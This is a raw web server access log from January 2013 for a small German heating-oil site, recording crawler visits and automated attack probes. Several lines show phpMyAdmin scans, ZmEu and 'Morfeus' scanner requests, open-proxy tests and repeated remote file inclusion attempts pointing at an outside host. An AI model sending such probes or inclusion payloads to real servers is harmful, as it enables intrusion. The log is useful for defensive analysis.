173.59.108.98 - - [09/Jan/2013:19:58:32 +0100] "HEAD /phpmyadmin/print.css HTTP/1.1" 404 - "http://212.91.246.87/phpmyadmin/print.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
141.8.147.1 - - [09/Jan/2013:20:20:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
46.165.193.147 - - [09/Jan/2013:20:58:37 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:37 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:38 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:39 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:39 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:39 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:39 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:40 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:40 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [09/Jan/2013:20:58:40 +0100] "GET /myadmin/translators.html HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
54.243.1.44 - - [09/Jan/2013:23:06:45 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "-"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.195 - - [10/Jan/2013:00:15:32 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
46.165.193.147 - - [10/Jan/2013:00:33:07 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:07 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:07 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:08 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:09 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:09 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:09 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:09 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:09 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
46.165.193.147 - - [10/Jan/2013:00:33:10 +0100] "GET /phpadmin/translators.html HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
54.243.1.44 - - [10/Jan/2013:00:44:48 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
69.64.78.213 - - [10/Jan/2013:02:26:32 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
69.64.78.213 - - [10/Jan/2013:02:26:32 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
69.64.78.213 - - [10/Jan/2013:02:26:38 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
206.253.226.23 - - [10/Jan/2013:02:36:11 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
157.55.32.107 - - [10/Jan/2013:04:42:32 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.107 - - [10/Jan/2013:04:44:22 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
78.30.200.81 - - [10/Jan/2013:08:07:44 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:45 +0100] "GET /Diesel.htm HTTP/1.0" 404 327 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:47 +0100] "GET /Heizoel-Berlin-2.html HTTP/1.0" 404 338 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:48 +0100] "GET /Heizoel-Berlin.htm HTTP/1.0" 404 335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:49 +0100] "GET /Heizoel.htm HTTP/1.0" 404 328 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:51 +0100] "GET /li_esso.htm HTTP/1.0" 404 328 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:52 +0100] "GET /seiten/impressum.htm HTTP/1.0" 404 337 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:54 +0100] "GET /seiten/main.htm HTTP/1.0" 404 332 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:55 +0100] "GET /seiten/schmier.htm HTTP/1.0" 404 335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:56 +0100] "GET /seiten/service.htm HTTP/1.0" 404 335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [10/Jan/2013:08:07:58 +0100] "GET /seiten/start.htm HTTP/1.0" 404 333 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
194.153.113.35 - - [10/Jan/2013:11:29:49 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
157.55.32.107 - - [10/Jan/2013:12:51:31 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.107 - - [10/Jan/2013:12:53:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
140.203.154.11 - - [10/Jan/2013:12:54:46 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; sindice-site-manager/0.1.0 +http://sindice.com/developers/bot)"
140.203.154.11 - - [10/Jan/2013:12:54:46 +0100] "GET /sitemap.xml HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; sindice-site-manager/0.1.0 +http://sindice.com/developers/bot)"
140.203.154.11 - - [10/Jan/2013:12:54:46 +0100] "GET /sitemap.xml.gz HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; sindice-site-manager/0.1.0 +http://sindice.com/developers/bot)"
69.175.126.170 - - [10/Jan/2013:15:12:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
65.55.213.73 - - [10/Jan/2013:16:22:18 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [10/Jan/2013:16:22:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
54.243.1.44 - - [10/Jan/2013:16:28:38 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "-"
178.77.126.55 - - [10/Jan/2013:16:32:22 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [10/Jan/2013:16:32:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
94.102.51.246 - - [10/Jan/2013:21:28:32 +0100] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5CF HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
64.246.165.50 - - [11/Jan/2013:02:31:49 +0100] "GET /robots.txt HTTP/1.0" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.50 - - [11/Jan/2013:02:31:49 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferantberlin-69b.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.17.190 - - [11/Jan/2013:02:45:12 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.17.190 - - [11/Jan/2013:02:45:12 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--essohndler-u5a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.210 - - [11/Jan/2013:03:01:46 +0100] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.210 - - [11/Jan/2013:03:01:46 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--premiuml-t4a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.178.34 - - [11/Jan/2013:03:26:24 +0100] "GET /robots.txt HTTP/1.0" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.178.34 - - [11/Jan/2013:03:26:24 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferungen-pwb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.5.42 - - [11/Jan/2013:04:43:36 +0100] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.5.42 - - [11/Jan/2013:04:43:36 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlpreiseberlin-2zb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
176.9.51.211 - - [11/Jan/2013:04:53:05 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.211 - - [11/Jan/2013:04:53:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
216.145.5.42 - - [11/Jan/2013:05:04:35 +0100] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.5.42 - - [11/Jan/2013:05:04:35 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlberlin-ufb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.240.136.96 - - [11/Jan/2013:05:43:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
206.253.226.23 - - [11/Jan/2013:07:27:29 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
85.17.29.107 - - [11/Jan/2013:08:56:00 +0100] "GET /robots.txt HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
85.17.29.107 - - [11/Jan/2013:08:56:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
141.8.147.1 - - [11/Jan/2013:11:31:35 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
54.234.73.63 - - [11/Jan/2013:12:02:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
65.55.213.73 - - [11/Jan/2013:15:26:58 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [11/Jan/2013:15:26:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.153.113.7 - - [11/Jan/2013:18:26:51 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
141.8.147.1 - - [11/Jan/2013:18:46:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
184.73.55.214 - - [11/Jan/2013:18:56:50 +0100] "GET / HTTP/1.0" 200 1229 "http://www.go-profitclicking.com" "-"
206.253.226.18 - - [11/Jan/2013:19:00:58 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
178.255.215.74 - - [11/Jan/2013:19:33:32 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
178.255.215.74 - - [11/Jan/2013:19:33:32 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
5.9.112.180 - - [11/Jan/2013:20:12:29 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.112.180 - - [11/Jan/2013:20:12:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.146.19 - - [11/Jan/2013:20:33:23 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.146.19 - - [11/Jan/2013:20:33:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
94.102.51.246 - - [11/Jan/2013:20:41:52 +0100] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5CA HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
221.203.12.8 - - [11/Jan/2013:21:27:30 +0100] "GET /appserv/main.php?appserv_root=http://112.216.99.212:8081/t.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
221.203.12.8 - - [11/Jan/2013:21:27:30 +0100] "GET /appserv/main.php?appserv_root=http://112.216.99.212:8081/t.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
221.203.12.8 - - [11/Jan/2013:21:27:30 +0100] "GET /appserv/main.php?appserv_root=http://112.216.99.212:8081/t.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
221.203.12.8 - - [11/Jan/2013:21:27:30 +0100] "GET /appserv/main.php?appserv_root=http://112.216.99.212:8081/t.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
221.203.12.8 - - [11/Jan/2013:21:27:30 +0100] "GET /appserv/main.php?appserv_root=http://112.216.99.212:8081/t.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
221.203.12.8 - - [11/Jan/2013:21:27:30 +0100] "GET /appserv/main.php?appserv_root=http://112.216.99.212:8081/t.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
221.203.12.8 - - [11/Jan/2013:21:27:30 +0100] "GET /appserv/main.php?appserv_root=http://112.216.99.212:8081/t.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
157.55.34.166 - - [11/Jan/2013:22:12:56 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.34.166 - - [11/Jan/2013:22:15:04 +0100] "GET /referenzen.htm HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
184.73.55.214 - - [11/Jan/2013:23:27:26 +0100] "GET / HTTP/1.0" 200 1229 "http://www.go-profitclicking.com" "-"
54.243.1.44 - - [12/Jan/2013:01:03:23 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
195.42.102.21 - - [12/Jan/2013:04:36:06 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
195.42.102.21 - - [12/Jan/2013:04:36:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
194.153.113.35 - - [12/Jan/2013:05:47:15 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
92.240.68.152 - - [12/Jan/2013:06:18:34 +0100] "GET http://img12.nnm.ru/8/a/8/e/5/a7d6182d3c9c6137e9809c96bb3.jpg HTTP/1.1" 404 345 "-" "webcollage/1.135a"
85.25.246.225 - - [12/Jan/2013:07:10:57 +0100] "GET /robots.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.25.246.225 - - [12/Jan/2013:07:11:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.13.147.71 - - [12/Jan/2013:14:14:12 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
65.55.213.73 - - [12/Jan/2013:15:44:34 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [12/Jan/2013:15:44:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.69.133.67 - - [12/Jan/2013:18:36:00 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)"
141.8.147.1 - - [12/Jan/2013:18:37:32 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.32.107 - - [12/Jan/2013:18:48:38 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.107 - - [12/Jan/2013:18:50:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
74.216.94.31 - - [13/Jan/2013:01:06:49 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
141.8.147.1 - - [13/Jan/2013:02:38:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
195.132.40.189 - - [13/Jan/2013:04:03:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
66.249.76.40 - - [13/Jan/2013:04:59:28 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.40 - - [13/Jan/2013:04:59:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.143.5.52 - - [13/Jan/2013:05:10:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
24.249.225.4 - - [13/Jan/2013:05:19:10 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
46.4.67.132 - - [13/Jan/2013:05:23:32 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.132 - - [13/Jan/2013:05:23:36 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
92.240.68.153 - - [13/Jan/2013:05:43:14 +0100] "GET http://www.moose-software.com/Images/verified_visa.jpg HTTP/1.1" 404 338 "-" "webcollage/1.135a"
141.8.147.1 - - [13/Jan/2013:06:26:04 +0100] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
83.194.140.221 - - [13/Jan/2013:06:44:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
69.175.126.170 - - [13/Jan/2013:07:12:50 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
77.253.212.61 - - [13/Jan/2013:07:30:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
23.21.24.219 - - [13/Jan/2013:07:51:02 +0100] "GET /robots.txt HTTP/1.0" 404 315 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
23.21.24.219 - - [13/Jan/2013:07:51:03 +0100] "GET / HTTP/1.0" 200 1229 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
67.202.9.230 - - [13/Jan/2013:07:51:15 +0100] "GET /robots.txt HTTP/1.0" 404 315 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
67.202.9.230 - - [13/Jan/2013:07:51:15 +0100] "GET / HTTP/1.0" 200 1229 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
220.255.2.158 - - [13/Jan/2013:07:55:27 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
65.55.24.216 - - [13/Jan/2013:08:57:26 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.216 - - [13/Jan/2013:08:58:59 +0100] "GET /seiten/produkte_hzoel.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.1 - - [13/Jan/2013:09:00:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
23.20.196.230 - - [13/Jan/2013:09:16:48 +0100] "GET /robots.txt HTTP/1.0" 404 315 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
184.72.82.95 - - [13/Jan/2013:09:16:58 +0100] "GET /robots.txt HTTP/1.0" 404 315 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
23.20.196.230 - - [13/Jan/2013:09:16:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
